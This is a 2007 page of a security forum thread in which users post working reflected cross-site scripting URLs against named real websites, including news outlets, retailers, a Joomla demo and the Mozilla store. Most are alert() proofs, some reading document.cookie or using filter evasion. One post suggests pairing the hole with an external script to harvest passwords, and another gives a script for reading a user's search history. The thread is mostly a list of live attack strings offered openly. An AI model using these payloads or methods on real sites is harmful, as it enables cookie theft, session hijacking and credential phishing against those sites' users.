Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4748495051525354555657...LastNext
Current Page: 52 of 65
Re: So it begins
Posted by: tx
Date: July 21, 2007 12:36AM

Kind of a cool fragmented xss thing here. The searchword variable is limited at 20 characters; the searchphrase variable isn't limited (afaik) but ' is escaped as \', hence fragmenting: http://demo.joomla.org/demo10/index.php?searchword=%27%3B/*&searchphrase=*/alert%28document.cookie%29%3B//&option=com_search

alerts from the <select> (name=limit class=inputbox) box when the onchange event occurs.
Affects Joomla 1.0.* (current is 1.0.12)

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 07/21/2007 12:48AM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: July 21, 2007 03:21PM

station.sony.com


[www.station.sony.com]

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: July 28, 2007 08:11PM

http://www.timesonline.co.uk/tol/sitesearch.do?query=%22;alert('xss');//&hitsperpage=10&jumpToPrevious=0&mode=SIMPLE&nextOffset=0&offset=0&leftStartIndex=1&leftEndIndex=10&jumpToPrevious=0&mode=SIMPLE&submitStatus=searchFormSubmitted&sectionId=2820&x=0&y=0

http://publish.vx.roo.com/thedaily/videoplayer/?channel=Movies&clipid=%27%3Balert%28%27xss%27%29%3B//

http://www.nypost.com/search/search.htm?q=%3Cscript%3Ealert('xss');%3C/script%3E&s=news&t=0

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3C!--&imageField.x=0&imageField.y=0

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=story&getfields=*&filter=0&sort=date:D:S:d1&q=%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/28/2007 08:19PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 02, 2007 12:25PM

Pownce.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://pownce.com/forgot/&email=%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 14, 2007 03:45AM

more ethicalhacker.net (this is still not fixed btw http://sla.ckers.org/forum/read.php?3,44,12928#msg-12928):

had to do a little evasion for the filter and mod_rewrite stuff
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54'%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666/topic,1584.0/

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/14/2007 03:49AM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 16, 2007 12:54PM

http://list.research.microsoft.com/scripts/lyris.pl?enter=%3Cimg%20src%20onerror=%22alert('xss');%22%3E&text_mode=&lang=english

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 21, 2007 02:39PM

http://blog.meebo.com/?year=%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://k2.gamespress.com/search.asp?x=-1&string=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!&orig=Search%2bpress%2bcenter&subject=&publisher=&date=&search=-1

EDIT:
http://www.ooorgle.com/component/option,com_remository/Itemid,36%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666
http://www.ooorgle.com/component/option,com_remository/Itemid,36/func,select/id,4%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/21/2007 03:32PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: August 21, 2007 04:39PM

http://www.washington.org/index.cfm?blnNavView=True&idContentType=429&idCurrentPage='%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: August 21, 2007 11:10PM

http://www.download.com/sort/3140-2001_4-0-1-3.html?gfiletype=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: August 21, 2007 11:23PM

http://www.amazon.com/gp/daily/ref=%22/%3E%3Cscript%3Ealert('XSS%20$4.99%20+%20S&H')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 22, 2007 04:16PM

http://www.asmallworld.net/publicpages/jobs.php?seltab=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C/script%3E%5D%21%3E%3C%21%5B

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: wrayal
Date: August 22, 2007 05:14PM

http://mystuff.ask.com/mysearch/DisplaySearchesHome?sort=%22%29%7D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E&t=images

(script src tags +
xmlhttp = new XMLHttpRequest();xmlhttp.open("GET"," http://mystuff.ask.com/mysearch/DisplaySearchesHome?t=history&sort=dedate",true);xmlhttp.onreadystatechange=function() {if (xmlhttp.readyState==4) {mine=(xmlhttp.responseText);parse()}};xmlhttp.send(null)
for the most 'fun')

Options: ReplyQuote
Re: So it begins
Posted by: wrayal
Date: August 22, 2007 05:19PM

http://www.search.org/search/default.asp?yider=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

http://www.brainboost.com/search.asp?Q=%22%3E%3C%2Ftitle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Submit=ask
[3-in-1 - each alert is actually a separately exploited flaw]

[edit to remove previously found exploits]



Edited 3 time(s). Last edit at 08/22/2007 06:18PM by wrayal.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 22, 2007 05:51PM

@wrayal: Please be sure to do a search before submitting. Both the search.lycos.com and www.hotbot.com issues have already been disclosed in this thread.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: ma1
Date: August 25, 2007 04:55AM

Ministry of External Affairs, India

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: So it begins
Posted by: FiSh
Date: August 25, 2007 12:54PM

Here's a bunch at once...

http://playwithyourmind.com/online-games.php?category=%3Cscript%3Ealert(1)%3C/script%3E
http://shoplinc.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.tasteofnovascotia.com/recipe_directory/search.php?letter=%3Cscript%3Ealert(1)%3C/script%3E
http://www.webmarketinfo.com/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://bondagegirls.org/1/search.php?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://sierraactivist.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://rpms.mandrivaclub.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.suche4free.de/search.php?query=%22%3E%3Cscript%3Ealert%2814444324224%29%3C%2Fscript%3E
http://www.diyzone.net/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.popcultureshock.com/timm/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.xtra-ppc.com/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://google.pocetnastrana.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.s-it.lt/search/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.roxter.pl/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&region=1&page=
http://www.search.bg/search.php?query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
http://api.cakephp.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://trailfire.com/pages/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://xmlsoft.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://hledani.tiscali.cz/news/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.iconcrawler.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://mskd.ru/isearch.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.notefish.com/search.php?st=tag&query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.egosurf.org/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.eed.usv.ro/news/search.php?query=%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.luckyscafe.com/search.php?query=%22%3E%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.myspacelayoutspy.com/search.php?cat=car&query=%3Cscript%3Ealert(1)%3C/script%3E
http://minkaku.goga.co.jp/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.theknowledge-brokers.com/find/search.php?type=or&search=1&results=20&query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.researchsea.com/html/experts.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.p2gems.org/index.php?action=search&search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://search.jongo.com/searchAll.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.franksicons.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.electionguide.org/news-search.php?country=125&year=any&keyword=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitted=1&submit.x=0&submit.y=0&submit=Search
http://www.noah-health.org/search/results.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.ajfca.org/gallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.uoresources.com/search.php?search_term=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&shard=Atlantic
http://win-big-prizes.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://searchnetfast.info/webtrue/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://netinfofirst.info/inftrue/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://meganetsearch.info/infsite/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.surfnetkids.com/related.php?t=%3Cscript%3Ealert(1)%3C/script%3E&c=/wordsearch.htm
http://www.podcastdirectory.com/search/showword.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.drugs.com/search.php?searchterm=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&is_main_search=1
http://www.girmantas.com/photogallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.richardhumphrys.com.au/stock/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://qwsa.biz/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.searchmechanism.com/search/search.php?said=1973&sbox=1&qq=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Start+Search+Mechanism
http://www.gvla.org/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.lufee.com/lufee.php?f=lumrix-search&v=&lufee=&k=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.dreamwork.eu/index.php?s=%3Cscript%3Ealert(1)%3C/script%3E
http://www.chcf.org/error/index.cfm?eurl=%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.synergymx.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://alvares.name/searchform.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
http://smartphone.mobiletopsoft.com/search.php?querywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosuredataonline.com/listings.php?county='%3Cscript%3Ealert(1)%3C/script%3E
http://www.spinblessing.com/search.php?Query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.edrugsearch.com/web.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&d=&qty=
http://www.dalbani.co.uk/search.php?case=prefix&by=name&limit=25&q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.deborahrenshaw.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.geometry.net/cgi-bin/988.cgi?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://seekxml.com/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.oeffa.org/alphasearch.php?alpha=%3Cscript%3Ealert(1)%3C/script%3E
http://www.beinggirl.co.in/main/re_searchrestest.php?search=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.top40-charts.com/pedia.php?title=Special:Search/%3Cscript%3Ealert(1)%3C/script%3E
http://www.olshan.com/search.php?str=%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosure1.com/lview.php?county_name=%3Cscript%3Ealert(1)%3C/script%3E
http://julian.hoosierroots.com/search.php?surname=%3Cscript%3Ealert(1)%3C/script%3E&lnqualify=equals&mybool=AND
http://www.dorilynterrace.com/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.stga.co.uk/search.php?language=-1&region=-1&name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Search+for+guides

13337.org

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: August 25, 2007 01:42PM


Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 28, 2007 09:17PM

http://www.lexisnexis.com/search/Results1.asp?redirect&s=1&target=%0a%0d%3Cscript%3Ealert%28%27xss%27%29%3B%3C/script%3E

http://www.lexisnexis.com/search/Results1.asp?datasections=&query=<script>alert('xss');</script>&Go.x=0&Go.y=0&Go=Get+Answers Javascript only executes once the user follows one of the Category links on the left

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Date: August 28, 2007 10:13PM

Didn't they have a breach, and the FTC sued them? or was that card systems that got sued by them? If so you would think they would be more security aware by now.

Options: ReplyQuote
Re: So it begins
Posted by: DoctorDan
Date: August 29, 2007 11:50PM

Oh, this is glorious- gave me a laugh at least =P
This one's for you, RSnake... you can probably guess: http://www.bordersstores.com/search/title_detail.jsp?id=56783606&srchTerms=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx%20x=%22&mediaType=1&srchType=Keyword

-Dan



Edited 1 time(s). Last edit at 08/29/2007 11:50PM by DoctorDan.

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: September 01, 2007 08:11AM

hxxp://econ.worldbank.org/external/default/main?menuPK=51515855&pagePK=64256479&piPK=64165424&q='"><script>alert('x')</script>&theSitePK=469372
[www.youare.tv]

- site also allows javascript in your profile: [www.youare.tv]

I am just learning this xss stuff so there is probably alot more you could do with this



Edited 1 time(s). Last edit at 09/01/2007 08:26AM by skpx.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: September 03, 2007 05:06PM

Another fragmented vector for Joomla (i'd demonstrate it on demo.joomla.org, but they took it down when it got pwnd.)
http://www.salvagedata.com/index.php?option=com_search&Itemid=248&searchword=%22%3E%3C%21%5B&submit=Search&searchphrase=any&ordering=%5D%21%3E%3Cscript%09%3Ealert%28%27xss%27%29%3B%3C/script%3E%3C%21

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 09/03/2007 05:07PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: September 04, 2007 06:55AM


Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: September 04, 2007 07:08AM

http://www.zonealarm.com/store/content/catalog/products/sku_list_zaas.jsp;jsessionid=GdKmp20qkkLsvx8EpnK1zpyCKN3yl8KWSfXK0Er2X7fKYXT244OF!-82891113!-1062696904!7551!7552!NONE?dc=34std&ctry=&lang=<script>alert('boo')</script>

Hope this wasn't posted before.

Small joke: I make that xss in the "Spyware protection" area of the site.

Options: ReplyQuote
Re: So it begins
Posted by: wrayal
Date: September 05, 2007 07:46AM

http://www.thelink.co.uk/index.php?page=searchresult&sTypeSearch=searchMobile&search_universe=1&aSearchCritere=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

The exploited variable has a limit to its length (39 I believe). But...the site has a login page. Use XSS + an external script and you fish out a lot of usernames and passwords.

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: September 05, 2007 10:07AM


Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: September 06, 2007 05:53PM

So I emailed mozilla customer service with an XSS hole, and this was their response.
Mozilla store XSS

--------------------------------------------------------------------------------

Sent: 9/1/2007
To: Customer Service
Subject: Re: General

Hi, I thought you would like to know there is a cross site scripting
vulnerability in your webstore. The code parameter is not sanitized before
being used on the page. Reference my example. Please contact me and let me
know how you deal with these issues.
http://store.mozilla.org/product.php?code=mz1303223%22%3E%3Cscript%3Ealert(1)%3C/script%3E&catid=&offset=0

RESPONSE:

Dear ,

Thank you for your inquiry. From the message that was received, I was not able
to discern your question. Please reply to this message with your concern, or
you can reach me by phone at 888-738-4300.

Best Regards,

Tia Vandersnick
Customer Service
GatewayCDI
909 North 20th Street
Saint Louis, MO 63106
314-535-1888 ext. 301
tia.vandersnick@gatewaycdi.com
www.gatewaycdi.com
BUILD YOUR BRAND

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: September 07, 2007 09:58AM

You forgot to add question marks. Most people don't need those to derive questions from a sentence but some people aren't that.. dynamic.

Your xss is fixed though.

Options: ReplyQuote
Re: So it begins
Posted by: Reiners
Date: September 08, 2007 08:32PM

http://www.aimpages.com/.resource/pictures?t=accountname&id=';alert(document.cookie);x='s

(you dont have to replace "accountname")

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: September 09, 2007 11:31PM

i need any expert here to find Xss flaw in my friend website. www.stonemaster.biz . Please full disclose here. Thx in advance

Options: ReplyQuote
Pages: PreviousFirst...4748495051525354555657...LastNext
Current Page: 52 of 65


Sorry, only registered users may post in this forum.